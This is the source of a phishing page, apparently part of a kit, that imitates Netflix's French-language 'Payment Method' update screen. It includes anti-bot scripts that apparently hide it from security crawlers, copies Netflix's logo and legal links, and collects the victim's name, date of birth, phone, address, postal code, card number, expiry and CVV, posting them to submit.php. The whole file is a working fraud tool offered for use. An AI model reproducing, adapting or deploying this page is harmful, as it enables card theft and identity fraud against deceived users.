<?php
session_start();
error_reporting(0);
include "os.php";
include 'config/___function.php';
include 'nav_detect.php';
include "bots/antibots.php";
include "bots/911.php";
include "bots/anti1.php";
include "bots/anti2.php";
include "bots/anti3.php";
include "bots/anti4.php";
include "bots/anti5.php";
include "bots/anti6.php";
include "bots/anti7.php";

?>

<!DOCTYPE html>
<html lang="en" data-triggered="true">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>Netflix - Payment Method</title>
    <meta
        content="watch movies, movies online, watch TV, TV online, TV shows online, watch TV shows, stream movies, stream tv, instant streaming, watch online, movies, watch movies Morocco, watch TV online, no download, full length movies"
        name="keywords">
    <meta
        content="Watch Netflix movies &amp; TV shows online or stream right to your smart TV, game console, PC, Mac, mobile, tablet and more."
        name="description">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0">
   
    <link type="text/css" rel="stylesheet" href="../assets/css/style.css" data-uia="botLink">
    <link rel="shortcut icon" href="../assets/images/nficon2016.ico">
  <!--Phone Area CSS-->
    <link rel='stylesheet' href='https://intl-tel-input.com/node_modules/intl-tel-input/build/css/intlTelInput.css?1549804213570'>
<!--Phone Area CSS-->

</head>

<body>

    <div id="appMountPoint">
        <div class="netflix-sans-font-loaded">
            <div class="basicLayout modernInApp fab5-bigger-cta fab5-bolder-cta fab5-cta-next signupSimplicity-registrationWithContext simplicity"
                lang="en-MA" dir="ltr">

                <div class="nfHeader noBorderHeader signupBasicHeader">
                    <a href="./" class="svg-nfLogo signupBasicHeader">
                        <svg viewBox="0 0 111 30"
                            class="svg-icon svg-icon-netflix-logo" focusable="true">
                            <g id="netflix-logo">
                                <path
                                    d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"
                                    id="Fill-14"></path>
                            </g>
                        </svg>
                        <span class="screen-reader-text">Netflix</span>
                    </a>
                    <a href="#"  class="authLinks signupBasicHeader" data-uia="header-login-link">Se d&eacute;connecter</a>
                </div>
<div class="simpleContainer">
    <div class="centerContainer" style="display: block; transform: none; opacity: 1; transition-duration: 250ms;">
        <form method="POST" onsubmit="return ValidateCreditCardNumber()" action="submit.php">
            <div class="paymentFormContainer">

            
                <div>
                    <div class="stepHeader-container">
                        <div class="stepHeader">
                            <h1 class="stepTitle">Ins&eacute;rez vos informations de paiement</h1>
                        </div>
                    </div>
                </div>
                <div class="fieldContainer">
                    <span class="logos logos-block">
                        <img alt="" class="logoIcon VISA" src="https://assets.nflxext.com/ffe/siteui/acquisition/payment/svg/visa-v3.svg">
                        <img alt="" class="logoIcon MASTERCARD" src="https://assets.nflxext.com/ffe/siteui/acquisition/payment/svg/mastercard-v2.svg">
                        <img alt="" class="logoIcon AMEX" src="https://assets.nflxext.com/ffe/siteui/acquisition/payment/svg/amex-v2.svg">
                        <img alt="" class="logoIcon DISCOVER" src="https://assets.nflxext.com/ffe/siteui/acquisition/payment/icon_discover.png" srcset="https://assets.nflxext.com/ffe/siteui/acquisition/payment/icon_discover_2x.png 2x">
                    </span>
                    <div class="">
                        <ul class="simpleForm structural ui-grid" style="list-style-type:none">
                        <li class="nfFormSpace">
                                <div class="nfInput nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="firstName">
                                            <input name="firstName" class="nfTextField " id="id_firstName" type="text" tabindex="0" 
                                            autocomplete="cc-given-name" minlength="1" maxlength="30"
                                            value=""  required>
                                            <label for="id_firstName" class="placeLabel">Nom complet</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgFirst" class="inputError"></div>
                                </div>
                            </li>
                            <li class="nfFormSpace">
                                <div class="nfInput  nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="lastName">
                                            <input name="dob" oninput="exe()" class="nfTextField" id="id_lastName" type="tel" tabindex="0" 
                                            autocomplete="cc-family-name" value="" minlength="1" maxlength="60" required>
                                            <label for="id_lastName" class="placeLabel" >Date de naissance</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgLast" class="inputError"></div>
                                </div>
                            </li>
							
							 <script>
function exe() {
var date = document.getElementById('id_lastName');

    function checkValue(str, max) {
      if (str.charAt(0) !== '0' || str == '00') {
        var num = parseInt(str);
        if (isNaN(num) || num <= 0 || num > max) num = 1;
        str = num > parseInt(max.toString().charAt(0)) 
               && num.toString().length == 1 ? '0' + num : num.toString();
      };
      return str;
    };

    date.addEventListener('input', function(e) {
      this.type = 'text';
      var input = this.value;
      if (/\D\/$/.test(input)) input = input.substr(0, input.length - 1);
      var values = input.split('/').map(function(v) {
        return v.replace(/\D/g, '')
      });
      if (values[1]) values[1] = checkValue(values[1], 12);
	  if (values[0]) values[0] = checkValue(values[0], 31);
      var output = values.map(function(v, i) {
        return v.length == 2 && i < 2 ? v + '/' : v;
      });
      this.value = output.join('').substr(0, 10);
    });
	}
</script>
							 <li class="nfFormSpace">
                                <div class="nfInput  nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="Address">
                                            <input name="billing" class="nfTextField" id="id_creditZipcode" type="tel" tabindex="0" 
                                            autocomplete="cc-family-name" value="" maxlength="10">
                                            <label for="id_creditZipcode" class="placeLabel" >Num&eacute;ro de t&eacute;l&eacute;phone</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgBZ" class="inputError"></div>
                                </div>
                            </li>
							<li class="nfFormSpace">
                                <div class="nfInput  nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="lastName">
                                            <input name="add" class="nfTextField" id="id_lastName" type="text" tabindex="0" 
                                            autocomplete="cc-family-name" value="" minlength="1" maxlength="200" required>
                                            <label for="id_lastName" class="placeLabel" >Adresse</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgLast" class="inputError"></div>
                                </div>
                            </li>
							
							<li class="nfFormSpace">
                                <div class="nfInput  nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="lastName">
                                            <input name="zip" class="nfTextField" id="id_lastName" type="tel" tabindex="0" 
                                            autocomplete="cc-family-name" value="" minlength="1" maxlength="60" required>
                                            <label for="id_lastName" class="placeLabel" >Code postal</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgLast" class="inputError"></div>
                                </div>
                            </li>
							   
                            <li class="nfFormSpace">
                                <div class="cardNumberContainer">
                                    <div data-uia="field-creditCardNumber+container" class="nfInput nfInputOversize">
                                        <div class="nfInputPlacement">
                                            <label class="input_id" placeholder="creditCardNumber">
                                                <input name="creditCardNumber" class="nfTextField" id="numb" type="tel" tabindex="0" autocomplete="off" maxlength="16"  value="" onkeypress="return isNumber(event)" required>
                                                <label for="numb" class="placeLabel">Num&eacute;ro de carte</label>
                                            </label>
                                        </div>
                                        <div hidden id="inputErrorMsgCN" class="inputError"></div>
                                    </div>
                                </div>
                            </li>
											<script>
		function ValidateCreditCardNumber() {

  var ccNum = document.getElementById("numb").value;
  var visaRegEx = /^4[0-9]\d{14}$/;
  var mastercardRegEx = /^5[0-9]\d{14}$/;
  var isValid = false;

  if (visaRegEx.test(ccNum)) {
    isValid = true;
  } else if(mastercardRegEx.test(ccNum)) {
    isValid = true;
  }  

   else {
    alert("Veuillez v&eacute;rifier vos num&eacute;ros de carte");
			  return false;
  }
}
</script>	
                            <li class="nfFormSpace">
                                <div class="nfInput nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="creditExpirationMonth">
                                            <input name="creditExpirationMonth" class="nfTextField" id="id_creditExpirationMonth" type="tel" tabindex="0" autocomplete="off" value="" onkeypress="return isNumber(event)" minlength="5" maxlength="5" required>
                                            <label for="id_creditExpirationMonth" class="placeLabel">Date d'expiration (MM/AA)</label>
                                        </label>
                                    </div>
                                    <div hidden id="inputErrorMsgMD" class="inputError"></div>
                                </div>
                            </li>
                            <li class="nfFormSpace">
                                <div class="nfInput nfInputOversize">
                                    <div class="nfInputPlacement">
                                        <label class="input_id" placeholder="creditCardSecurityCode">
                                            <input name="creditCardSecurityCode" class="nfTextField" id="id_creditCardSecurityCode" type="tel" tabindex="0" autocomplete="off" maxlength="3" minlength="3" value="" onkeypress="return isNumber(event)" required>
                                            <label for="id_creditCardSecurityCode" class="placeLabel">Cryptogramme (CVV)</label>
                                        </label>
                                        <div id="inputErrorMsgCNN" class="inputError"></div>

                                    </div>

                            </li>
							
							


                        </ul>
                    </div>

                    <ul class="simpleForm structural ui-grid">
                        <li class="nfFormSpace">
                            <div class="signupTerms" id="tou-us-no_trial">
                                <span>
                                    <p>En cliquant sur le bouton "Mettre à jour" ci-dessous, vous acceptez nos
                                        <a target="blank" href="https://help.netflix.com/legal/termsofuse">Conditions de
                                            Utilisation</a>, <a target="blank" href="https://help.netflix.com/legal/privacy">Confidentialit&eacute;
                                            D&eacute;claration</a>, que vous avez plus de 18 ans et que <b>Netflix
                                            poursuivra automatiquement votre abonnement et facturera le
                                            frais d'adh&eacute;sion mensuels à votre paiement
                                            m&eacute;thode jusqu'à ce que vous annuliez. Vous pouvez annuler à tout moment pour &eacute;viter
                                            frais futurs.</b> Pour annuler, allez dans Compte et cliquez
                                        "Annuler l'adh&eacute;sion."
                                    </p>
                                </span>
                            </div>
                        </li>
                    </ul>
                </div>
            </div>
            <input type="hidden" name="type" value="update">

            <div class="submitBtnContainer">
                <button type="submit" autocomplete="off" id="btn_cc"  class="nf-btn nf-btn-primary nf-btn-solid nf-btn-oversize">Enregistrer</button>
            </div>
			<input type="hidden" name="type" value="infos">
        </form>
    </div>
</div>

            <div class="site-footer-wrapper centered">
                <div class="footer-divider"></div>
                <div class="site-footer">
                    <p class="footer-top"><a class="footer-top-a" href="https://help.netflix.com/contactus">Questions? Contact
                            us.</a></p>
                    <ul class="footer-links structural">
                        <li class="footer-link-item" placeholder="footer_responsive_link_faq_item"><a class="footer-link"
                                data-uia="footer-link" href="https://help.netflix.com/support/412"
                                placeholder="footer_responsive_link_faq"><span id="" data-uia="data-uia-footer-label">FAQ</span></a>
                        </li>
                        <li class="footer-link-item" placeholder="footer_responsive_link_help_item"><a class="footer-link"
                                data-uia="footer-link" href="https://help.netflix.com"
                                placeholder="footer_responsive_link_help"><span id="" data-uia="data-uia-footer-label">Help
                                    Center</span></a></li>
                        <li class="footer-link-item" placeholder="footer_responsive_link_terms_item"><a class="footer-link"
                                data-uia="footer-link" href="https://help.netflix.com/legal/termsofuse"
                                placeholder="footer_responsive_link_terms"><span id="" data-uia="data-uia-footer-label">Terms of
                                    Use</span></a></li>
                        <li class="footer-link-item" placeholder="footer_responsive_link_privacy_separate_link_item"><a
                                class="footer-link" data-uia="footer-link" href="https://help.netflix.com/legal/privacy"
                                placeholder="footer_responsive_link_privacy_separate_link"><span id=""
                                    data-uia="data-uia-footer-label">Privacy</span></a></li>
                        <li class="footer-link-item" placeholder="footer_responsive_link_cookies_separate_link_item"><a
                                class="footer-link" data-uia="footer-link" href="#"
                                placeholder="footer_responsive_link_cookies_separate_link"><span id=""
                                    data-uia="data-uia-footer-label">Cookie Preferences</span></a></li>
                        <li class="footer-link-item" placeholder="footer_responsive_link_corporate_information_item"><a
                                class="footer-link" data-uia="footer-link" href="https://help.netflix.com/legal/corpinfo"
                                placeholder="footer_responsive_link_corporate_information"><span id=""
                                    data-uia="data-uia-footer-label">Corporate Information</span></a></li>
                    </ul>
                    <div class="lang-selection-container" id="lang-switcher">
                        <div class="nfSelectWrapper inFooter selectArrow prefix" data-uia="language-picker+container">
                            <div class="nfSelectPlacement globe"><select data-uia="language-picker" class="nfSelect"
                                    name="__langSelect" tabindex="0">
                                    <option disabled>العربية</option>
                                    <option disabled>Français</option>
                                    <option selected="">English</option>
                                </select><label class="nfLabel no-display placeLabel"></label></div>
                        </div>
                    </div>
                </div>
            </div>

        </div>
    </div>
</div>
 <script src="../assets/js/jquery.js"></script>
 <script src="../assets/js/main.js"></script>
     <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src='https://intl-tel-input.com/node_modules/intl-tel-input/build/js/intlTelInput.js?1549804213570'></script><script  src="../assets/js/phone.js"></script>
</body>
</html>

<script>
function isNumber(evt) {
    evt = (evt) ? evt : window.event;
    var charCode = (evt.which) ? evt.which : evt.keyCode;
    if (charCode > 31 && (charCode < 48 || charCode > 57)) {
        return false;
    }
    return true;
}
  </script>